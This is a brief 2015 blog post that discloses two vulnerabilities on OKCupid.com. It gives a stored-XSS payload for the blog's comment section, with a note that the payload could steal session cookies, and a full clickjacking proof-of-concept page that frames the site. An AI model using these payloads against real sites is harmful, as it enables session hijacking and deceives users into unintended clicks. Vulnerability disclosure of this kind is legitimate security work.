Wednesday, 16 September 2015

OKCupid.com Security holes

1) Stored XSS

In their blog at the comment section you could store XSS, and any user/admin who visited that blog post would get XSSed..
The POC: Input break, insert a non existent image and on error it pops up our script to steal session cookies etc...
“><img src=x onerror=prompt(1);>

 2) ClickJacking

POC:
<html>
  <head>
    <title>Clickjack test page</title>
  </head>
  <body>
  <style>
   iframe { 
     top:0; left:0;
     filter:alpha(opacity=50); /* in real life opacity=0 */
     opacity:1;
    }
  </style>
  <p>You've been clickjacked!</p>
    <iframe sandbox="allow-scripts allow-forms" src="http://okcupid.com
       style="width:100%;height:90%">
    </iframe>
  </body
</html>

what is clickjacking: www.owasp.org/index.php/Clickjacking